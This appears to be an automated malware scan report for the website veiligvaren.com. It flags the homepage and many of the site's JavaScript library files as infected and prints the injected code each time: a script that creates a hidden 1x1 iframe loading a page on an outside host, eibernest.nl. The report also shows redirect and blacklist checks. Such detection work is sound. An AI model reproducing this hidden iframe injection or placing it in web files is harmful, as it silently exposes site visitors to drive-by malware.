Scanned pages/files
Request | Server response | Status |
http://veiligvaren.com/ | 200 OK Content-Length: 9693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var lentt = document.createElement('iframe'); lentt.src = 'http://eibernest.nl/nl/esd.php'; lentt.style.position = 'absolute'; lentt.style.border = '0'; lentt.style.height = '1px'; lentt.style.width = '1px'; lentt.style.left = '1px'; lentt.style.top = '1px'; if (!document.getElementById('lentt')) { document.write('<div id=\'lentt\'></div>'); document.getElementById('lentt').appendChild(lentt); }})(); Antivirus reports:
| ||
http://veiligvaren.com/media/system/js/mootools-core.js | 200 OK Content-Length: 100432 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/media/system/js/core.js | 200 OK Content-Length: 8853 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/media/system/js/caption.js | 200 OK Content-Length: 4799 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/media/system/js/mootools-more.js | 200 OK Content-Length: 242401 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/jquery.js | 200 OK Content-Length: 97938 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/nivo.slider.js | 200 OK Content-Length: 33597 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/superfish.js | 200 OK Content-Length: 7784 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/hover.js | 200 OK Content-Length: 8211 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/scroll.js | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |
http://veiligvaren.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://veiligvaren.com/templates/tequoia/js/cufon-yui.js | 200 OK Content-Length: 22322 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/cufon-replace.js | 200 OK Content-Length: 4177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
| ||
http://veiligvaren.com/templates/tequoia/js/Bebas_400.font.js | 200 OK Content-Length: 36875 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var zenyn = document.createElement('iframe');
zenyn.src = 'http://eibernest.nl/nl/esd.php';
zenyn.style.position = 'absolute';
zenyn.style.border = '0';
zenyn.style.height = '1px';
zenyn.style.width = '1px';
zenyn.style.left = '1px';
zenyn.style.top = '1px';
if (!document.getElementById('zenyn')) {
document.write('<div id=\'zenyn\'></div>');
document.getElementById('zenyn').appendChild(zenyn);
}
})(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: veiligvaren.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 17:26:53 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ff2e3f56b13872b00b0ad52a13822ac0=dq0umca63am96n1fard3s52m82; path=/
X-Powered-By: PHP/5.3.21
GET / HTTP/1.1
Host: veiligvaren.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 17:26:53 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ff2e3f56b13872b00b0ad52a13822ac0=dq0umca63am96n1fard3s52m82; path=/
X-Powered-By: PHP/5.3.21
Second query (visit from search engine):
GET / HTTP/1.1
Host: veiligvaren.com
Referer: http://www.google.com/search?q=veiligvaren.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: veiligvaren.com
Referer: http://www.google.com/search?q=veiligvaren.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=veiligvaren.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://veiligvaren.com/
Result: veiligvaren.com is not infected or malware details are not published yet.
Result: veiligvaren.com is not infected or malware details are not published yet.